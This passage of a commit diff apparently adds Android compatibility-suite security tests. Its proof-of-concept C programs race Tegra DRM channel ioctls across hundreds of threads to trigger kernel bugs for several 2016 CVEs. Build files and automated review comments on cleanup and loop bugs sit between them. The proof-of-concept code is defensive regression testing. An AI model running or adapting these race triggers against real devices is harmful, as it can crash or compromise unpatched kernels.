+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SET_CLK_CONSTRAINT 0x13
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+ puts("ran 1");
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ puts("ran 2");
+ return 0;
+}
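Review bot: `pthread_kill(clk_thread_id[i], SIGKILL)` in the cleanup loop does not stop a single thread; SIGKILL terminates the whole process. As a result `close(fd)`, `puts("ran 2")` and `return 0` are never reached, and the binary ends with a kill status that the harness cannot tell apart from a crash. When the loop is entered through `goto out_clk_thread` after a failed pthread_create, it also passes never-initialised (zero) thread ids to pthread_kill. Returning from main() already ends all threads, so the loop can simply be removed. The leftover `puts("ran 1")`/`puts("ran 2")` output should either go or be documented as markers the host test reads. The same cleanup loop is in CVE-2016-6730/poc.c.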
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
new file mode 100644
index 0000000..03b7b87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6732
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
new file mode 100644
index 0000000..5b8ea8e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define THREAD_NUM 900
+#define TRY_TIMES 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret){
+ }else{
+ }
+ /* close */
+ close_c.context = open_c.context;
+
+ /* swtich to child */
+ usleep(500);
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
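Review bot: `pthread_kill(thread_id[i], SIGKILL)` in the cleanup loop under `out_thread:` does not stop a single thread; the action of SIGKILL is process-wide, so the first call terminates the whole test binary. That leaves `close(fd)` and `return 0` unreachable whenever at least one thread was created, and the host-side caller presumably sees death by signal instead of a clean exit. A stop flag keeps the exit deterministic: `while (ret && !stop)` in `child`, then `stop = 1; pthread_join(thread_id[i], NULL);` in the loop. The same cleanup pattern appears in the poc.c files for CVE-2016-6733, -6734, -6735 and -6736 in this commit.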
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
new file mode 100644
index 0000000..7b02188
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6733
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
new file mode 100644
index 0000000..1c1dde9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+#endif
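Review bot: Nothing in this commit appears to include `local_pwn.h`: the poc.c added next to it pulls in only system headers and repeats the same macros, enum and structs, so the header is dead weight as written. If it is meant to be the shared definition, poc.c should `#include "local_pwn.h"` and drop its own copies, and the header should itself include `<linux/types.h>` and `<sys/ioctl.h>`, since it uses `__u32`, `__u64` and `_IOWR`. The guard `__local_pwn_H__` is a reserved identifier (leading double underscore); `LOCAL_PWN_H` would do. The `SIOCIWFIRSTPRIV` and `PRIV_CMD_*` constants look unrelated to the DRM ioctls defined below them and could be dropped.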
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
new file mode 100644
index 0000000..7980fc9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+#define THREAD_NUM 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = THREAD_NUM, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ printf("[+] open failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ /* close */
+ close_c.context = open_c.context;
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ if(ret){
+ }else{
+ open_c.context = 0UL;
+ }
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
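Review bot: The return value of `DRM_IOCTL_TEGRA_OPEN_CHANNEL` in main's loop is overwritten by the close call before it is examined, so a failed open still goes on to close with whatever `open_c.context` already held. The CVE-2016-6734 test in this commit guards that step with `if(ret == 0)`; adding `if (ret) continue;` after the open ioctl would keep the two consistent. The open-failure message is tagged `[+]` while set_affinity uses `[-]` for failures, and that path returns 0, so a device without `/dev/dri/renderD129` is indistinguishable from a completed run. Using `[-] open failed` and a distinct exit code would make the outcome readable from the host side.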
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
new file mode 100644
index 0000000..e1eebbd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6734
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
new file mode 100644
index 0000000..60b3a3c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_START_KEEPON 0x10
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_START_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_START_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_START_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
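Review bot: `while(try_time)` in main decrements only inside `if(ret == 0)`, so on a device where `DRM_IOCTL_TEGRA_OPEN_CHANNEL` keeps failing the loop never ends and the test hangs until the harness times out, spinning without the `usleep`. Decrementing unconditionally (`while(try_time--)`, as the CVE-2016-6732 test does) bounds the run. Separately, the `goto out_keepon_thread` path after a failed `pthread_create` runs `pthread_kill` over all `KEEPON_THREAD_NUM` entries, including zero-initialised ids that were never created. Keep the created count and loop only up to it. Both issues are repeated in the CVE-2016-6735 and CVE-2016-6736 poc.c files.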
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
new file mode 100644
index 0000000..8935cd6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6735
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
